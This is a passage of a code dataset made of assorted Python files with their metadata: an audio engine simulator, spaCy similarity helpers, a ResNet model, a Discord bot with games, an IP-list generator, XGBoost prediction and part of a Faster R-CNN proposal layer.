hertz.\n self.time_step = 1 / rate\n\n # We are only partially initialized, we only start when the user first\n # calls next.\n self.anim_state = FreqAnimator.INIT_STATE\n\n def reset(self):\n self.anim_state = FreqAnimator.INIT_STATE\n\n def is_done(self):\n return self.anim_state == FreqAnimator.DONE_STATE\n\n def next(self, dt, old_val):\n if self.anim_state == FreqAnimator.INIT_STATE:\n # This is our starting value!\n self.cur_value = old_val\n\n # Move towards the goal of state 0, starting without progress.\n self.state_i = 0\n self.state_progress = 0\n self.accum_time = 0.0\n\n # We are not done, and not partially initialized, which is sorta\n # what the init state signifies\n self.anim_state = FreqAnimator.RUNNING_STATE\n\n # As long as we are not done, do stuff, otherwise skip it all\n if self.anim_state != FreqAnimator.DONE_STATE:\n # Accumulate the time\n self.accum_time += dt\n\n # Time to do something\n if self.accum_time >= self.time_step:\n # We handled some time, so remove it for next time\n self.accum_time -= self.time_step\n\n # How much do we have to add total?\n goal = self.states[self.state_i]\n\n if goal == 0:\n # Skip this state, and move on, since we've already technically\n # satisfied it.\n state += 1\n else:\n # This will either be 1 or -1, it tells us how much to add to the\n # old value.\n direction = goal // abs(goal)\n\n # How much have we moved?\n self.state_progress += direction\n\n # Do the move\n self.cur_value += direction\n\n # Haved we moved enough?\n if abs(self.state_progress) >= abs(goal):\n # Continue to the next state.\n self.state_i += 1\n # Reset our progress, but not our accumulated time.\n self.state_progress = 0\n\n if self.state_i >= len(self.states):\n # We've gone through every state\n self.anim_state = FreqAnimator.DONE_STATE\n\n # When we are done, this will just stay constant, so we don't have to\n # worry about it.\n return self.cur_value\n\ndef square(t, f):\n return 4 / math.pi * (math.sin(2 * math.pi * f * t) +\n 1 / 3 * math.sin(6 * math.pi * f * t) +\n 1 / 5 * math.sin(10 * math.pi * f * t))\n\nclass InactiveGeneratorError(Exception):\n pass\n\nclass GeneratorAudio:\n\n STATE_OFF = 'off'\n STATE_STEADY = 'steady'\n STATE_GOING_UP = 'up'\n STATE_GOING_DOWN = 'down'\n\n def __init__(self, cur_freq = START_FREQUENCY, anim_rate = ANIM_RATE):\n self.last_time = 0.0\n self.buf = bytearray(0)\n self.state = GeneratorAudio.STATE_OFF\n self.cur_freq = cur_freq\n\n self.const_freq_anim = FreqConst()\n self.up_freq_anim = FreqAnimator(anim_rate, 100, -150, 70)\n self.down_freq_anim = FreqAnimator(anim_rate, -100, 150, -70)\n\n self.debug_file = None\n\n def write_audio(self, fo):\n self.debug_file = fo\n\n def step_up(self):\n if self.is_active():\n if self.state != GeneratorAudio.STATE_GOING_UP:\n # Reset animation.\n self.up_freq_anim.reset()\n\n self.state = GeneratorAudio.STATE_GOING_UP\n else:\n raise InactiveGeneratorError()\n\n def step_down(self):\n if self.is_active():\n if self.state != GeneratorAudio.STATE_GOING_DOWN:\n # Reset animation.\n self.down_freq_anim.reset()\n\n self.state = GeneratorAudio.STATE_GOING_DOWN\n else:\n raise InactiveGeneratorError()\n\n def is_active(self):\n return self.state != GeneratorAudio.STATE_OFF\n\n def start(self):\n if not self.is_active():\n self.state = GeneratorAudio.STATE_STEADY\n def stop(self):\n if self.is_active():\n self.state = GeneratorAudio.STATE_OFF\n\n def pa_callback(self, in_data, frame_count, time_info, status):\n if self.is_active():\n # Return noises\n return self.aud_cb(frame_count), pyaudio.paContinue\n else:\n # Return silence\n return bytes(frame_count * FRAME_SIZE), pyaudio.paContinue\n\n def aud_cb(self, frame_count):\n # Resize the buffer if necessary.\n if frame_count * FRAME_SIZE != len(self.buf):\n self.buf = bytearray(frame_count * FRAME_SIZE)\n\n freq = self.cur_freq\n\n freq_anim = self.const_freq_anim\n if self.state == GeneratorAudio.STATE_GOING_UP:\n # We are going up, set up that 'animator'.\n freq_anim = self.up_freq_anim\n elif self.state == GeneratorAudio.STATE_GOING_DOWN:\n # We are going down, etc.\n freq_anim = self.down_freq_anim\n\n # Generate some data\n for i in range(frame_count):\n dt = i / SAMPLE_RATE\n cur_time = self.last_time + dt\n\n val = square(cur_time, freq) * .02 + \\\n noise.pnoise1(cur_time * freq, octaves=5,\n persistence=.95,lacunarity=2.0) * .98\n val *= 1.1\n struct.pack_into(' ')\n except KeyboardInterrupt:\n # Clear the line so the user's prompt doesn't show up on the same\n # line.\n sys.stdout.write('\\n')\n sys.stdout.flush()\n cmd = \"quit\"\n\n # Step up the \"engine\"\n if cmd == 'start':\n print('Starting engine...')\n eng.start()\n elif cmd == 'stop':\n print('Stopping engine...')\n eng.stop()\n elif cmd == 'step':\n print('Stepping up...')\n eng.step_up()\n # Step down the \"engine\"\n elif cmd == 'down':\n print('Stepping down...')\n eng.step_down()\n # Print engine information\n elif cmd == 'status':\n # This happens every iteration, just be quiet about it.\n pass\n # Quit the program\n elif cmd == \"quit\":\n print(\"Quitting...\")\n break\n # Read the source code!\n elif cmd == 'help':\n print('No help for you!')\n else:\n print('Unknown command, try again!')\n\n print('Engine state:', eng.state, 'Freq:', eng.cur_freq)\n\n # Clean up\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"226620577","text":"\"\"\"Functions for spaCy language processing pipeline and computing\ncosine similarity on spacy `Doc`s' word embeddings.\n\"\"\"\n\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom typing import List\nfrom typing import Mapping\nfrom typing import Union\nfrom .utils import cosine_similarity\nfrom .utils import normalise_vector\n\nfrom spacy.language import Language\nfrom spacy.tokens import Doc\n\n\n# Selected POS tags (https://universaldependencies.org/u/pos/)\nPARTS_OF_SPEECH = []\n\n# Spacy pipe parameters\nPIPE_PARAMS = {'n_process': 1,\n 'batch_size': 50}\n\n\ndef spacy_preprocessor(\n texts: List[str],\n nlp: Language,\n disable: List[str] = ['ner', 'parser', 'textcat'],\n make_lemma: bool = True,\n make_lowercase: bool = True,\n keep_alpha: bool = True,\n keep_pos: List[str] = PARTS_OF_SPEECH,\n remove_punctuation: bool = True,\n remove_stopwords: bool = True,\n pipe_params: Mapping[str, object] = PIPE_PARAMS\n) -> List[Doc]:\n \"\"\"Given a list of text strings, returns a list of processed spaCy `Doc`\n objects (one for each text). A `Doc` object is a sequence of Token objects\n with methods to access Tokens' information (both original and processed)\n and to perform NLP tasks (e.g. words vector and similarity).\n\n An custom pipeline component is added to register a custom extention\n on the Doc. This custom extention (`Doc._.selected_tokens`) contains tokens\n that satisfy the `keep_words, `keep_pos`, `remove_punctuation`, and\n `remove_stopwords` conditions. Note that these conditions do not produce\n disjoint sets of tokens (e.g. only keeping NOUNS with `pos` logically\n excludes all punctuation).\n\n Note: if the conditions above are all False or None, then\n `Doc._.selected_tokens` contains all tokens that matches with the\n regular expression (\\\\w+)\n\n Args:\n texts (list of str): \n List of text strings to process.\n\n nlp (spaCy Language object): \n Pre-trained spaCy model (https://spacy.io/usage/models).\n\n disable (list of str): \n Names of spaCy pipeline components to disable.\n\n make_lemmas (bool): \n If True, adds tokens' lemma into the\n custom extention `Doc._.selected_tokens`;\n defaults to True. If False, disables spaCy's lemmatizer pipeline\n component (even if it not included in `disable`) and adds\n tokens' original text into the custom extention\n Doc._.selected_tokens.\n\n make_lowercase (bool): \n If True, converts all tokens in custom extension\n Doc._selected_tokens into lowercase.\n\n keep_alpha (bool): \n If True, only tokens with alphabetic characters are\n kept in the custom extention `Doc._.selected_tokens`\n\n keep_pos (list of str): \n Only tokens with parts-of-speech tags in `keep_pos`\n are kept in the custom extention `Doc._.selected_tokens`.\n If `keep_pos` is empty, adds all tokens regardless of its\n part-of-speech tag. Defaults to `PARTS_OF_SPEECH = []`.\n\n remove_punctuation (bool): \n If True, removes all punctuation in the custom extention\n Doc._.selected_tokens; defaults to True.\n\n remove_stopwords (bool): \n If True, removes stopword tokens in the custom extention\n `Doc._.selected_tokens`; defaults to False. Stopword removal\n seems to be computationally expensive. Avoid using this\n unless necessary.\n\n pipe_params (Kwargs in `spacy.language.Language.pipe`): \n See https://spacy.io/api/language#pipe\n\n Returns:\n A list of processed spaCy Doc objects.\n\n References: https://spacy.io/usage/processing-pipelines\n \"\"\"\n component_config = {'filters': {\n 'make_lemma': make_lemma,\n 'make_lowercase': make_lowercase,\n 'keep_alpha': keep_alpha,\n 'keep_pos': keep_pos,\n 'remove_punctuation': remove_punctuation,\n 'remove_stopwords': remove_stopwords}}\n component_name = 'filter'\n if not(component_name in nlp.pipe_names):\n # Add custom component\n nlp.add_pipe('filter', config=component_config, last=True)\n docs = []\n for doc in tqdm(nlp.pipe(texts,\n disable=disable,\n **PIPE_PARAMS),\n total=len(texts)):\n docs.append(doc)\n return docs\n\n\ndef spacy_similarity(docs: List[Doc],\n text: str,\n nlp: Language,\n norm: Union[None, str] = \"l2\") -> List[float]:\n \"\"\"Given a list of text in `docs` and `text` string,\n returns list of cosine similarity scores to `text`. Order of elements\n are left unchanged (i.e. identical to `docs`).\n\n Note: `norm` can be set to \"l1\", \"l2\", or \"max\" to scale vectors using\n the l1, l2, and max norm. Defaults to \"l2\".\n If None, vectors are not normalised.\n \"\"\"\n\n def normalise(norm):\n def _normalise(v):\n # Numba linear algebra operations are only supported on\n # contiguous arrays\n v = np.ascontiguousarray(v)\n return normalise_vector(v, order)\n if norm == 'l1':\n order = 1\n if norm == 'l2':\n order = 2\n return _normalise\n\n query_doc = nlp(text) # Convert text into a spaCy Doc object\n u = query_doc.vector\n vectors = list(map(\n lambda doc: np.average([np.array(token.vector_) for token\n in doc._.filtered_matches], axis=0), docs))\n if norm:\n func = normalise(norm)\n u = func(u)\n vectors = list(map(lambda v: func(v), vectors))\n scores = list(map(lambda v: cosine_similarity(u, v)\n if not(np.isnan(v).any()) else 0, vectors))\n return scores\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"src/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"79635190","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\n\nimport Utils\n\n\nclass BN_Conv2d(nn.Module):\n \"\"\"\n BN_CONV, default activation is ReLU\n \"\"\"\n\n def __init__(self, in_channels: object, out_channels: object, kernel_size: object, stride: object, padding: object,\n dilation=1, groups=1, bias=False, activation=True) -> object:\n super(BN_Conv2d, self).__init__()\n layers = [nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, groups=groups, bias=bias),\n nn.BatchNorm2d(out_channels)]\n if activation:\n layers.append(nn.ReLU(inplace=False))\n self.seq = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.seq(x)\n\n\nclass BN_Conv2d_Leaky(nn.Module):\n \"\"\"\n BN_CONV_LeakyRELU\n \"\"\"\n\n def __init__(self, in_channels: object, out_channels: object, kernel_size: object, stride: object, padding: object,\n dilation=1, groups=1, bias=False) -> object:\n super(BN_Conv2d_Leaky, self).__init__()\n self.seq = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, groups=groups, bias=bias),\n nn.BatchNorm2d(out_channels)\n )\n\n def forward(self, x):\n return F.leaky_relu(self.seq(x))\n\n\nclass SE(nn.Module):\n\n def __init__(self, in_chnls, ratio):\n super(SE, self).__init__()\n self.squeeze = nn.AdaptiveAvgPool2d((1, 1))\n self.compress = nn.Conv2d(in_chnls, in_chnls // ratio, 1, 1, 0)\n self.excitation = nn.Conv2d(in_chnls // ratio, in_chnls, 1, 1, 0)\n\n def forward(self, x):\n out = self.squeeze(x)\n out = self.compress(out)\n out = F.relu(out)\n out = self.excitation(out)\n return F.sigmoid(out)\n\nclass BasicBlock(nn.Module):\n \"\"\"\n basic building block for ResNet-18, ResNet-34\n \"\"\"\n message = \"basic\"\n\n def __init__(self, in_channels, out_channels, strides, is_se=False):\n super(BasicBlock, self).__init__()\n self.is_se = is_se\n self.conv1 = BN_Conv2d(in_channels, out_channels, 3, stride=strides, padding=1, bias=False) # same padding\n self.conv2 = BN_Conv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=False, activation=False)\n if self.is_se:\n self.se = SE(out_channels, 16)\n\n # fit input with residual output\n self.short_cut = nn.Sequential()\n if strides is not 1:\n self.short_cut = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 1, stride=strides, padding=0, bias=False),\n nn.BatchNorm2d(out_channels)\n )\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.conv2(out)\n if self.is_se:\n coefficient = self.se(out)\n out = out * coefficient\n out = out + self.short_cut(x)\n return F.relu(out)\n\n\nclass BottleNeck(nn.Module):\n \"\"\"\n BottleNeck block for RestNet-50, ResNet-101, ResNet-152\n \"\"\"\n message = \"bottleneck\"\n\n def __init__(self, in_channels, out_channels, strides, is_se=False):\n super(BottleNeck, self).__init__()\n self.is_se = is_se\n self.conv1 = BN_Conv2d(in_channels, out_channels, 1, stride=1, padding=0, bias=False) # same padding\n self.conv2 = BN_Conv2d(out_channels, out_channels, 3, stride=strides, padding=1, bias=False)\n self.conv3 = BN_Conv2d(out_channels, out_channels * 4, 1, stride=1, padding=0, bias=False, activation=False)\n if self.is_se:\n self.se = SE(out_channels * 4, 16)\n\n # fit input with residual output\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_channels, out_channels * 4, 1, stride=strides, padding=0, bias=False),\n nn.BatchNorm2d(out_channels * 4)\n )\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.conv2(out)\n out = self.conv3(out)\n if self.is_se:\n coefficient = self.se(out)\n out = out * coefficient\n out = out + self.shortcut(x)\n return F.relu(out)\n\n\n\nclass ResNet(nn.Module):\n \"\"\"\n building ResNet_34\n \"\"\"\n\n def __init__(self, block: object, groups: object, num_classes, is_se=False) -> object:\n super(ResNet, self).__init__()\n self.channels = 64 # out channels from the first convolutional layer\n self.block = block\n self.is_se = is_se\n\n self.conv1 = nn.Conv2d(3, self.channels, 7, stride=2, padding=3, bias=False)\n self.bn = nn.BatchNorm2d(self.channels)\n self.pool1 = nn.MaxPool2d(3, 2, 1)\n self.conv2_x = self._make_conv_x(channels=64, blocks=groups[0], strides=1, index=2)\n self.conv3_x = self._make_conv_x(channels=128, blocks=groups[1], strides=2, index=3)\n self.conv4_x = self._make_conv_x(channels=256, blocks=groups[2], strides=2, index=4)\n self.conv5_x = self._make_conv_x(channels=512, blocks=groups[3], strides=2, index=5)\n self.pool2 = nn.AvgPool2d(7)\n patches = 512 if self.block.message == \"basic\" else 512 * 4\n self.fc = nn.Linear(patches, num_classes) # for 224 * 224 input size\n\n def _make_conv_x(self, channels, blocks, strides, index):\n \"\"\"\n making convolutional group\n :param channels: output channels of the conv-group\n :param blocks: number of blocks in the conv-group\n :param strides: strides\n :return: conv-group\n \"\"\"\n list_strides = [strides] + [1] * (blocks - 1) # In conv_x groups, the first strides is 2, the others are ones.\n conv_x = nn.Sequential()\n for i in range(len(list_strides)):\n layer_name = str(\"block_%d_%d\" % (index, i)) # when use add_module, the name should be difference.\n conv_x.add_module(layer_name, self.block(self.channels, channels, list_strides[i], self.is_se))\n self.channels = channels if self.block.message == \"basic\" else channels * 4\n return conv_x\n\n def forward(self, x):\n out = self.conv1(x)\n out = F.relu(self.bn(out))\n out = self.pool1(out) # 56*56\n out = self.conv2_x(out)\n out = self.conv3_x(out)\n out = self.conv4_x(out)\n out = self.conv5_x(out) # 7*7\n out = self.pool2(out)\n out = out.view(out.size(0), -1)\n out = F.softmax(self.fc(out))\n return out\n\n\ndef ResNet_18(num_classes=1000):\n return ResNet(block=BasicBlock, groups=[2, 2, 2, 2], num_classes=num_classes)\n\n\ndef ResNet_34(num_classes=1000):\n return ResNet(block=BasicBlock, groups=[3, 4, 6, 3], num_classes=num_classes)\n\n\ndef ResNet_50(num_classes=1000):\n return ResNet(block=BottleNeck, groups=[3, 4, 6, 3], num_classes=num_classes)\n\n\ndef ResNet_101(num_classes=1000):\n return ResNet(block=BottleNeck, groups=[3, 4, 23, 3], num_classes=num_classes)\n\n\ndef ResNet_152(num_classes=1000):\n return ResNet(block=BottleNeck, groups=[3, 8, 36, 3], num_classes=num_classes)\n\n\ndef ResNet_50_SE(num_classes=1000):\n return ResNet(block=BottleNeck, groups=[3, 4, 6, 3], num_classes=num_classes, is_se=True)\n\n\ndef test():\n net = ResNet_18()\n # net = ResNet_34()\n # net = ResNet_50()\n # net = ResNet_101()\n # net = ResNet_152()\n # net = ResNet_50_SE()\n # net = ResNet_50()\n\n summary(net, (3, 224, 224))\n ins = torch.randn([1, 3, 224, 224], dtype=torch.float32)\n flops_res, param_res = Utils.count_flops_param(net, ins)\n #\n print(\"ResNeXt flops= {0},v1 param = {1} \".format(flops_res, param_res))\n\n # net = torchvision.models.resnet34(pretrained=False)\n # print(net)\n # summary(net, (3, 224, 224))\n\n\nif __name__ == '__main__':\n test()\n # net = ResNet_18(2)\n # Utils.test_model(epoch=20, model=net, size=(224, 224))\n","sub_path":"ResNext.py","file_name":"ResNext.py","file_ext":"py","file_size_in_byte":7941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"409547870","text":"def cortarIp(ip):\n ip2 = ''\n for c in range(len(ip)):\n if ip[c] != '.':\n ip2 = ip2 + ip[c]\n else:\n ip2 = ip2 + ' '\n lista = list(ip2.split())\n print('lista cortada com sucesso', lista)\n return lista\n\n\ndef converterInteiro(lista):\n for i in range(0, 3):\n lista[i] = int(lista[i])\n print('Lista convetida inteiro', lista)\n return lista\n\n\ndef criaIps(lista):\n lista_ips = []\n temp0 = temp1 = temp2 = temp3 = 'a'\n for i in range(0, 254):\n temp0 = str(lista[0])\n temp1 = str(lista[1])\n temp2 = str(lista[2])\n temp3 = str(i)\n lista_ips.append(temp0 + '.' + temp1 + '.' + temp2 + '.' + temp3)\n return lista_ips\n\nip = str(input('Digite um IP: [xxx.xxx.xxx.xxx]'))\n#ip = str('128.1.0.1')\nlista = cortarIp(ip)\nlista = converterInteiro(lista)\nlista = criaIps(lista)\n\nfor c in range(len(lista)):\n print(lista[c])\n\n","sub_path":"Aulas-04-Soldyd/Exercicio/aula07.py","file_name":"aula07.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"483676215","text":"\"\"\"\nPraticar tarefa de programação: Exercícios adicionais (opcionais)\n\nExercício 1\nEscreva um programa que receba um número inteiro positivo na entrada e verifique se é primo. Se o número for primo, imprima \"primo\". Caso contrário, imprima \"não primo\".\n\nExemplos:\n\nDigite um número inteiro: 13\nprimo\n\n----------------------------\n\nDigite um número inteiro: 12\nnão primo\n\"\"\"\n\n\ndef check_if_prime_number(number: int) -> bool:\n it_is_divisible = 0\n\n for index in range(1, number + 1):\n if number % index == 0:\n it_is_divisible += 1\n\n if it_is_divisible > 2:\n return False\n return True\n\n\nnumber = int(input(\"Digite um número inteiro e positivo: \"))\nresult = \"primo\" if check_if_prime_number(number) else \"não primo\"\n\nprint(f\"\\n{result}\")\n","sub_path":"FirstPart/Week4/Additional/PrintPrimeNumber.py","file_name":"PrintPrimeNumber.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"584198095","text":"from django.contrib import admin\n\nfrom wechat.models import WechatUser\n\n\n@admin.register(WechatUser)\nclass WechatUserAdmin(admin.ModelAdmin):\n list_display = ('slug', 'open_id', 'union_id', 'nickname', 'gender',)\n readonly_fields = ('slug', 'open_id', 'union_id', 'nickname', 'avatar_url', 'gender', 'city',\n 'province', 'country', 'oauth2_scope',)\n","sub_path":"server/wechat/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"498363818","text":"from discord.ext import commands\nfrom random import choice, randint, shuffle\nimport re\nfrom enum import Enum\n\nimport shared\nimport phasmorpg\n\nclass PhasmoTrait():\n def __init__(self, t_name, t_desc, t_dependencies):\n self.trait_name = t_name\n self.trait_desc = t_desc\n self.trait_dependencies = t_dependencies\n\n def conflict(self, lost_items):\n pass\n\n\nclass PhasmoItems(Enum):\n DOTS_PROJECTOR = 1\n EMF_READER = 2\n FLASHLIGHT = 3\n GHOST_WRITING_BOOK = 4\n SPIRIT_BOX = 5\n UV_LIGHT = 6\n VIDEO_CAMERA = 7\n CANDLE = 8\n CRUCIFIX = 9\n GLOWSTICK = 10\n HEAD_MOUNTED_CAMERA = 11\n LIGHTER = 12\n MOTION_SENSOR = 13\n PARABOLIC_MICROPHONE = 14\n PHOTO_CAMERA = 15\n SALT = 16\n SANITY_PILLS = 17\n SMUDGE_STICKS = 18\n SOUND_SENSOR = 19\n STRONG_FLASHLIGHT = 20\n THERMOMETER = 21\n TRIPOD = 22\n\nclass RockPaperScissors(Enum):\n \"\"\"Small class to handle rps game and emoji names\"\"\"\n ROCK = 1\n NEWSPAPER = 2\n SCISSORS = 3\n\nclass Games(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def pgame(self, ctx, num_traits:str, num_players:str=\"4\"):\n \"\"\"Khord gives custom RPG traits for Phasmo\"\"\"\n shared.log_command(ctx,f'pgame {num_traits} {num_players}')\n\n regex_passed_traits = regex_passed_players = None\n regex_passed_traits = re.search(\"^[1-9]{1}$\", num_traits)\n regex_passed_players = re.search(\"^[1-4]{1}$\", num_players)\n if not regex_passed_traits or not regex_passed_players:\n await ctx.send(f\"Invalid input. Usage: ;pgame number_of_traits(1-9) [number_of_players](1-4)\\n\")\n else:\n num_traits = int(num_traits)\n num_players = int(num_players)\n\n\n items_copy = phasmorpg.items.copy()\n for i in range(0,num_players):\n\n message = f\"```[PLAYER {i+1}]\\n + Traits:\\n\"\n\n traits = self.get_traits(num_traits)\n\n for trait in traits:\n message += f\"\\t{trait[0]} --- {trait[1]}\\n\"\n\n if [\"Forgetful\",\"Lose two random items from the mission\"] in traits:\n message += \" + Items Lost:\\n\"\n items_lost = self.get_items(items_copy)\n message += f\"\\t{items_lost[0]}\\n\\t{items_lost[1]}\\n\"\n\n message += f\" + (OPTIONAL) Personality: {self.get_personality()}\\n\"\n await ctx.send(f\"{message}```\")\n\n @commands.command()\n async def scissors(self, ctx):\n \"\"\"Challenge Khord with scissors\"\"\"\n shared.log_command(ctx,'scissors')\n\n result = self.rps_game(RockPaperScissors.SCISSORS)\n await ctx.send(result)\n\n @commands.command()\n async def paper(self, ctx):\n \"\"\"Challenge Khord with paper\"\"\"\n shared.log_command(ctx,'paper')\n\n result = self.rps_game(RockPaperScissors.NEWSPAPER)\n await ctx.send(result)\n\n @commands.command()\n async def rock(self, ctx):\n \"\"\"Challenge Khord with rock\"\"\"\n shared.log_command(ctx,'rock')\n\n result = self.rps_game(RockPaperScissors.ROCK)\n await ctx.send(result)\n\n\n def get_traits(self, count):\n \"\"\"Randomizes a copy of traits list, then pops desired amount for pgame\"\"\"\n traits = []\n c_copy = phasmorpg.traits.copy()\n shuffle(c_copy)\n for count in range(1, count+1):\n temp_index = randint(0,len(c_copy)-1)\n temp_trait = c_copy.pop(temp_index)\n traits.append(temp_trait)\n\n return traits\n\n def get_personality(self):\n \"\"\"Randomizes a personality for pgame\"\"\"\n return choice(phasmorpg.personalities)\n\n def get_items(self, items_copy):\n \"\"\"Randomizes 2 items for pgame\"\"\"\n items_gotten = []\n for item in range(0, 2):\n temp_index = randint(0,len(phasmorpg.items)-1)\n temp_item = items_copy.pop(temp_index)\n items_gotten.append(temp_item)\n return items_gotten\n\n def rps_game(self, player_choice):\n player_victory = False\n npc_choice = RockPaperScissors(randint(1,3))\n\n # Determine if player won\n if ((player_choice == RockPaperScissors.ROCK and npc_choice == RockPaperScissors.SCISSORS) or\n (player_choice == RockPaperScissors.SCISSORS and npc_choice == RockPaperScissors.NEWSPAPER) or\n (player_choice == RockPaperScissors.NEWSPAPER and npc_choice == RockPaperScissors.ROCK)):\n player_victory = True\n\n # Add player and bot choices to output statement\n outcome_statement = f\":{(player_choice.name).lower()}: ***vs*** :{(npc_choice.name).lower()}:\\n\"\n\n # Add victory/draw/loss result to output statement\n if player_victory:\n outcome_statement = outcome_statement + \"Purely luck, mortal. :white_check_mark:\"\n elif not player_victory and player_choice == npc_choice:\n outcome_statement += \"Hmm. Interesting. :monkey:\"\n else:\n outcome_statement += \"As expected from a feeble mind. You lose. :x:\"\n\n return (outcome_statement)","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"620446080","text":"# -*-encoding: utf-8-*-\nimport pickle\n\nimport pandas as pd\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\n\nmodel = pickle.load(open(\"difference.dat\", \"rb\"))\n\npath = 'data.csv'\n\ndata = pd.read_csv(path, header=None)\nx, y = data[list(range(15))], data[15]\nx.columns = ['我方本金', '我方利息', '资方本金', '资金方利息', '借款金额', '借款期数', '放款日期年', '放款日期月', '放款日期日', '首期应还款日年', '首期应还款日月',\n '首期应还款日日', '借款利率', '间隔天数', '是否足月', ]\n\nsource = xgb.DMatrix(x)\ny_pred = model.predict(source)\n\naccuracy = accuracy_score(y, y_pred)\n# 预测精准度: 99.22%\nprint(\"预测精准度: %.2f%%\" % (accuracy * 100.0))\n","sub_path":"day02/model_predict.py","file_name":"model_predict.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"385598760","text":"from setuptools import setup\n\nwith open('requirements.txt') as f:\n install_requires = f.read().strip().split('\\n')\n\nsetup(\n name=\"yaml2jupyterhub\",\n packages=[\"yaml2jupyterhub\"],\n install_requires=install_requires,\n include_package_data=True,\n entry_points={\n 'console_scripts': ['yaml2jupyterhub=yaml2jupyterhub.main:main'],\n },\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"620172013","text":"# -*- coding: utf-8 -*-\n# --------------------------------------------------------\n# Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Ross Girshick and Xinlei Chen\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nfrom lib.model.config import cfg\nfrom lib.model.bbox_transform import bbox_transform_inv, clip_boxes, bbox_transform_inv_tf, clip_boxes_tf\nfrom lib.model.nms_wrapper import nms\n\ndef proposal_layer(rpn_cls_prob, rpn_bbox_pred, im_info, cfg_key, _feat_stride, anchors, num_anchors):\n \"\"\"A simplified version compared to fast/er RCNN\n For details please see the technical report\n \"\"\"\n if type(cfg_key) == bytes:\n cfg_key = cfg_key.decode('utf-8')\n pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N\n post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N\n nms_thresh = cfg[cfg_key].RPN_NMS_THRESH\n\n # Get the scores and bounding boxes\n scores = rpn_cls_prob[:, :, :, num_anchors:]\n rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))\n scores = scores.reshape((-1, 1))\n proposals = bbox_transform_inv(anchors, rpn_bbox_pred)\n proposals = clip_boxes(proposals, im_info[:2])\n\n # Pick the top region proposals\n order = scores.ravel().argsort()[::-1]\n if pre_nms_topN > 0:\n order = order[:pre_nms_topN]\n proposals = proposals[order, :]\n scores = scores[order]\n\n # Non-maximal suppression\n keep = nms(np.hstack((proposals, scores)), nms_thresh)\n\n # Pick th top region proposals after NMS\n if post_nms_topN > 0:\n keep = keep[:post_nms_topN]\n proposals = proposals[keep, :]\n scores = scores[keep]\n\n # Only support single image as input\n batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)\n blob = np.hstack((batch_inds, proposals.astype(np.float32, copy=False)))\n\n return blob, scores\n\n\ndef proposal_layer_tf(rpn_cls_prob, rpn_bbox_pred, im_info, cfg_key, _feat_stride, anchors, num_anchors):\n if type(cfg_key) == bytes:\n cfg_key = cfg_key.decode('utf-8')\n pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N\n post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N\n nms_thresh = cfg[cfg_key].RPN_NMS_THRESH\n\n \"\"\"\n Get the scores and bounding boxes\n 获取所有anchors“是物体”的概率,接着_region_proposal里面的例子,这里得到的scores应该如下:\n array([[[[0.88079708, 0.88079708],\n [0.88079708, 0.88079708]],\n [[0.88079708, 0.88079708],\n [0.88079708, 0.88079708]]]])\n shape为(1, 2, 2, 2),即每行代表一个像素点对应的两个anchors“是物体”的概率。\n \"\"\"\n scores = rpn_cls_prob[:, :, :, num_anchors:]\n\n \"\"\"\n scores reshape成1维,scores如下:\n array([0.88079708, 0.88079708, 0.88079708, 0.88079708, 0.88079708, 0.88079708, 0.88079708, 0.88079708])\n \"\"\"\n scores = tf.reshape(scores, shape=(-1,))\n\n \"\"\"\n 接着_region_proposal里面的例子,rpn_bbox_pred reshape一下:\n array([[0., 0., 0., 0.],\n [0., 0., 0., 0.],\n [0., 0., 0., 0.],\n [0., 0., 0., 0.],\n [0., 0., 0., 0.],\n [0., 0., 0., 0.],\n [0., 0., 0., 0.],\n [0., 0., 0., 0.]])\n shape为(8, 4),每一行代表一个anchor boxes经过rpn回归之后得到predict boxes相对于anchor boxes的中心坐标和宽高的偏移量,具体解释见\n 